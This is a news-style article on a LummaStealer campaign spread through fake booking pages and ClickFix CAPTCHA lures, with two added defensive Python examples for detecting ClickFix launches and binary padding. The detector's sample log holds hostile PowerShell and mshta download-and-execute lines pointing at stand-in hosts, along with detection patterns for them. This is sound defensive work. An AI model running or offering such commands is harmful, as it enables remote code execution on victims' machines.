The LummaStealer operators have started abusing fake booking websites to expand their reach.
According to reports, the latest campaign using the information stealer targeted victims worldwide, luring them with bogus booking itinerary pages and fake CAPTCHA verification prompts that lead to execution of the malware payload.
LummaStealer is a Malware-as-a-Service offering that first appeared in 2022 and has generally spread via platforms such as GitHub and Telegram. The researchers noted, however, that the most recent data show the operators now targeting unwitting travellers.
The LummaStealer malware has transitioned from GitHub and Telegram vectors to booking portals.
Investigations found that the LummaStealer operators have taken a different approach by seeding the malware through booking portals. This technique is new: the malware was previously distributed mainly through channels like GitHub and Telegram.
The campaign's infection chain was first observed in early 2025, targeting consumers planning trips to Palawan, Philippines. Within a week the lure had shifted to a hotel in Munich, Germany, indicating a broader, global focus on travel-related platforms.
Victims are lured with phoney booking confirmation pages hosted on attacker-controlled domains. These pages present a CAPTCHA prompt, but instead of a genuine verification step it tricks the user into running a hidden malware payload.
The fake CAPTCHA is a ClickFix social engineering lure. ClickFix pages typically instruct the user to copy a command and paste it into the Windows Run dialog, so no exploit is involved: the user manually runs a PowerShell script that downloads and launches LummaStealer on their machine.
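Because the user, not an exploit, launches the script, the defender's best evidence is process telemetry. The following is an added example (not from the article or the researchers it cites) that scores constructed Sysmon-style process-creation records for the shape ClickFix produces: a script host spawned directly from explorer.exe with a download-and-execute command line. The record format, the hostnames and the scoring threshold are all assumptions made for the example.

```python
"""Flag ClickFix-style launches in process-creation telemetry.

Added example for this article; the records below are constructed to look like
flattened Sysmon Event ID 1 fields and are not real LummaStealer telemetry.
"""
import re
from dataclasses import dataclass

# Interpreters a pasted Run-dialog command usually ends up in.
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe", "wscript.exe", "cscript.exe"}
# Parents that mean a human typed or pasted the command (Run dialog is a child of explorer.exe).
INTERACTIVE_PARENTS = {"explorer.exe"}

# (regex, label); every hit adds one point to the score.
INDICATORS = [
    (r"(?i)\b(?:iex|invoke-expression)\b", "in-memory execution (iex)"),
    (r"(?i)\b(?:irm|iwr|invoke-restmethod|invoke-webrequest|downloadstring|downloadfile)\b", "remote fetch"),
    (r"(?i)-(?:w|windowstyle)\s+hidden", "hidden window"),
    (r"(?i)-(?:ep|executionpolicy)\s+bypass", "execution policy bypass"),
    (r"(?i)-(?:e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{20,}", "encoded command"),
    (r"(?i)\bmshta(?:\.exe)?\s+https?://", "mshta fetching a remote HTA"),
]


@dataclass
class ProcEvent:
    image: str
    parent_image: str
    command_line: str


def parse_event(line: str) -> ProcEvent:
    """Parse one tab-separated 'Key: value' record (constructed format, not Sysmon XML)."""
    fields = {}
    for part in line.rstrip("\n").split("\t"):
        key, _, value = part.partition(": ")
        fields[key] = value
    return ProcEvent(fields["Image"], fields["ParentImage"], fields["CommandLine"])


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def score_event(ev: ProcEvent) -> tuple[int, list[str]]:
    """Count command-line indicators; add one point when a script host is spawned
    straight from an interactive shell, which is how a pasted Run command appears."""
    reasons = [label for pattern, label in INDICATORS if re.search(pattern, ev.command_line)]
    if reasons and basename(ev.image) in SCRIPT_HOSTS and basename(ev.parent_image) in INTERACTIVE_PARENTS:
        reasons.append("script host spawned from explorer.exe (Run dialog / pasted command)")
    return len(reasons), reasons


def is_clickfix(ev: ProcEvent, threshold: int = 2) -> bool:
    return score_event(ev)[0] >= threshold


def scan(lines: list[str], threshold: int = 2) -> list[tuple[int, int, list[str]]]:
    """Return (line index, score, reasons) for every record at or above the threshold."""
    hits = []
    for idx, line in enumerate(lines):
        score, reasons = score_event(parse_event(line))
        if score >= threshold:
            hits.append((idx, score, reasons))
    return hits


SEP = "\t"
# Constructed sample records: two ClickFix-shaped launches, two benign ones.
SAMPLE_LOG = [
    SEP.join([r"Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"ParentImage: C:\Windows\explorer.exe",
              r'CommandLine: powershell -w hidden -ep bypass -c "iex (irm https://booking-verify.example.invalid/captcha.txt)"']),
    SEP.join([r"Image: C:\Windows\System32\mshta.exe",
              r"ParentImage: C:\Windows\explorer.exe",
              r"CommandLine: mshta https://itinerary.example.invalid/v.hta"]),
    SEP.join([r"Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"ParentImage: C:\Program Files\Microsoft VS Code\Code.exe",
              r"CommandLine: powershell.exe -NoLogo -NoExit"]),
    SEP.join([r"Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"ParentImage: C:\Windows\explorer.exe",
              r"CommandLine: powershell.exe -Command Get-Process"]),
]

if __name__ == "__main__":
    for idx, score, reasons in scan(SAMPLE_LOG):
        print(f"record {idx}: score {score}: {'; '.join(reasons)}")
```

On a live host the same evidence survives in two other places worth pulling during triage: the RunMRU key under HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU, which records what was pasted into the Run dialog, and PowerShell script block logging (Event ID 4104), which captures the decoded script even when the command line was encoded. The threshold of 2 will also surface administrators who launch scripts with -ep bypass from the desktop; treat those as tuning input rather than lowering the indicator set.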
The deployed LummaStealer binary has grown from roughly 2 MB in previous versions to about 9 MB. Researchers believe the increase reflects new evasion techniques, such as Binary Padding and Indirect Control Flow Obfuscation.
The researchers also noted that the larger file slows signature-based antivirus scanning; padding a sample is also a known way to push it past the size limits some scanners apply. The control-flow obfuscation works through dispatcher blocks that select the next code block at run time, so the real execution order is not visible to static analysis.
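Binary padding leaves a measurable footprint, and a triage script can check for it before any deeper analysis. The following is an added example (mine, not tooling from the article or the researchers) that slices a file into windows, counts how many are near-constant, and measures the run of identical bytes at the end of the file. The two "files" are constructed byte strings, not LummaStealer samples, and the thresholds are assumptions.

```python
"""Measure how much of a binary is filler, the footprint Binary Padding leaves.

Added example; the two "files" below are constructed byte strings, not malware samples.
"""
import math
import random
from collections import Counter


def shannon_entropy(data: bytes) -> float:
    """Bits per byte: 0.0 for one repeated value, close to 8.0 for random data."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def trailing_run_length(data: bytes) -> int:
    """Length of the run of a single byte value at the end of the file (a zero-padded overlay)."""
    if not data:
        return 0
    return len(data) - len(data.rstrip(bytes([data[-1]])))


def padding_report(data: bytes, window: int = 4096, low_entropy: float = 1.0) -> dict:
    """Count windows whose entropy is below the threshold and report them as filler."""
    total = len(data)
    filler = 0
    for off in range(0, total, window):
        chunk = data[off:off + window]
        if shannon_entropy(chunk) < low_entropy:
            filler += len(chunk)
    return {
        "size": total,
        "filler_bytes": filler,
        "filler_ratio": filler / total if total else 0.0,
        "trailing_run": trailing_run_length(data),
    }


def looks_padded(data: bytes, min_ratio: float = 0.5, min_size: int = 1 << 20) -> bool:
    """Heuristic verdict (assumed thresholds): a large file whose bulk is constant bytes."""
    rep = padding_report(data)
    return rep["size"] >= min_size and rep["filler_ratio"] >= min_ratio


# Constructed samples: 256 KiB of seeded pseudo-random "code" standing in for a real
# executable, once on its own and once with 1.75 MiB of zero bytes appended.
_rng = random.Random(2025)
CLEAN = _rng.randbytes(256 * 1024)
PADDED = CLEAN + b"\x00" * (1792 * 1024)

if __name__ == "__main__":
    for name, blob in (("clean", CLEAN), ("padded", PADDED)):
        rep = padding_report(blob)
        print(f"{name}: {rep['size']} bytes, filler {rep['filler_ratio']:.1%}, "
              f"trailing run {rep['trailing_run']}, padded={looks_padded(blob)}")
```

Two caveats a practitioner should keep in mind. Compressed or encrypted resources are high-entropy and will not count as filler, so the check errs toward false negatives rather than false positives. Conversely, an operator who pads with random bytes defeats the entropy test, leaving only the size anomaly as a signal. When the padding is a plain appended overlay, hashing the file with the trailing run stripped gives a fingerprint that stays stable across builds that differ only in how much padding was added.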
Experts warn that LummaStealer is evolving quickly and may come to resemble established malware families such as Emotet, which combines multiple delivery paths with sophisticated obfuscation.
With its increased payload complexity and new distribution techniques, the malware is likely to remain a significant threat in the coming months.
